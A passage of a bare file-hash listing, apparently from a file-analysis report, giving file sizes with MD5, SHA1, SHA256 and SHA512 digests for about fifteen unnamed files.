SHA512eab47349e23fa9e0afaa3fdf6d8eac56069263edf0b28e3dd6889c76a5a0acc6b310730a9fdb961e2a966e376e496ab23447a99ee74a8b702bf4c5b71cbed614
-
Filesize
41KB
MD50897b11d95ee6b03e0aa842a221983c9
SHA1b1bd0eb1d20bd70706f3a19707719fad18aa4365
SHA256880cb80d1d206d83854ee3e6a2ffd5d25a1d3acaa2aa1513842243af5fee233a
SHA51239bdcf88660ee14a0c6b3b6d2402991ab80bbfa05b526cd6d5b10c035a6ebf63b349b3f2c9532f048301f8415c2bbed57bc0f4409273fe8ec2014a63dbd9dc72
-
Filesize
215KB
MD5c7bb7b93bc4327b0190c852138cc4f0c
SHA1af779bc979d9d4515510b60511ef14d1d3331f47
SHA256bcb6f8e7702380c8f2eec6393a4a4d414027d75786593072e524aef7f4d232cd
SHA51256a4fe9007421e2a0a0afbfc12d1b3fa8544ff71986282292608966725e2a436b751fc4aa7a7bb99a0dfe50aada7419c4450d01dd94ac78251ab8ce33d432d55
-
Filesize
2.0MB
MD5170fb4fa36de83de39a9e228f17b0060
SHA14a9ee216442b6fc98152fe9e80e763d95caede6c
SHA256145dbb397089105d6d06a861d62b48be9fd2527fb7d023b114cf05b723cd3858
SHA512168f389ce7dd0a7feacf6505c1a52a6743900974dd11af86b2e07998817b2021f62dec0b00daffbc212fd51337500fa9ff1d669d708103de2337195db936ee8f
-
Filesize
75KB
MD51ece670aaa09ac9e02ae27b7678b167c
SHA1d98cffd5d00fe3b8a7a6f50a4cd2fc30b9ec565d
SHA256b88c6884675cdb358f46c1fbfeddf24af749372a6c14c1c4a2757d7bde3fbc39
SHA512ad8b877261b2f69c89aa429691da67100a054006504a2735948415eebdc38eba20f923d327347560d066e65b205e80ea8f0a296e586107dc051d9edc410b40c5
-
Filesize
5.6MB
MD513b26b2c7048a92d6a843c1302618fad
SHA189c2dfc01ac12ef2704c7669844ec69f1700c1ca
SHA2561753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256
SHA512d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455
-
Filesize
96KB
MD5930c41bc0c20865af61a95bcf0c3b289
SHA1cecf37c3b6c76d9a79dd2a97cfc518621a6ac924
SHA2561f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff
SHA512fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2
-
Filesize
129B
MD507834b0a34d096bab76c2f3ce434d493
SHA1dae76bf634d4a6140264df89bd181792da97c6fc
SHA256c35818f6e6fc425144ce957badc3c249f56df25d32b5419e5e42a431defd768e
SHA5120abe54aec1a09e96c9cd307a68fc35b237f47a307475bfa0928f4c73ab9337bff7cc30380d441a2cceaa75146e66340ca9fe8457b0e962cd94ccfe0d7b42ba8e
-
Filesize
65KB
MD515582e6b7aba679732ba5380b2279023
SHA18a87b88e988736645489b04aaf073a4300860227
SHA256ab5d90ce12df6b62e3e30c596c3b7ba5724fd2b695dfce163b9ca8f27a934320
SHA51282313130df456e6408b82f9b8f16b901dce9651178b9534000ddc83113c2ee9973b3efd523ed559c167039140c7ee9d0a9474302c2dfa49a5bdf23f903316ae8
-
Filesize
8KB
MD5cb8420e681f68db1bad5ed24e7b22114
SHA1416fc65d538d3622f5ca71c667a11df88a927c31
SHA2565850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf
-
Filesize
10KB
MD596509ab828867d81c1693b614b22f41d
SHA1c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
-
Filesize
145KB
MD58005b63da0a2688ea287976c6f943abe
SHA12c84df5324d1044f2fba0385319d0248dc5beb4b
SHA2560b96b4946ea996ef7d79b7d2d4d5bf3506457f26a47e835492c53f587f0a6111
SHA51289077d40eaf1f3cd1940d5f26796fee7634e38d63870861b85002aa4b66412f7741980d7c587a45f795fc3b27b71adb19776b20dc06f5b70b5efdaa10171ae25
-
Filesize
84KB
MD5a775d164cf76e9a9ff6afd7eb1e3ab2e
SHA10b390cd5a44a64296b592360b6b74ac66fb26026
SHA256794ba0b949b2144057a1b68752d8fa324f1a211afc2231328be82d17f9308979
SHA51280b2d105d2fac2e56b7ea9e1b56057e94ffe594c314ea96668d387ab120b24be580c58d68d37aca07273d3ce80f0d74f072102469f35cb02e2295817e1f16808
-
Filesize
502KB
MD5a9c9735f6e34482c1cdd09e347a98787
SHA16214e43cdc3fd17978955abf9c01a8d8c3ea791e
SHA256533d8476431fefd3f83fd39d66366277b2420a549cb01e9232f558b2617871fc
SHA512084b40e683d88e8eda7a60047f1a640310455986629a63382b3b6ffa6a91f295b47963e2ba52115cb113f57f1f727f2adb98f910a9adca1596af242f266b4a50
-
Filesize
83KB
MD506560b5e92d704395bc6dae58bc7e794
SHA1fbd3e4ae28620197d1f02bfc24adaf4ddacd2372
SHA2569eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d
SHA512b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3
-
Filesize
2.7MB
MD5870feaab725b148208dd12ffabe33f9d
SHA19f3651ad5725848c880c24f8e749205a7e1e78c1
SHA256bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55
SHA5125bea301f85e6a55fd5730793b960442bc4dab92d0bf47e4e55c5490448a4a22ed6d0feb1dbe9d56d6b6ff8d06f163381807f83f467621f527bc6521857fc8e1a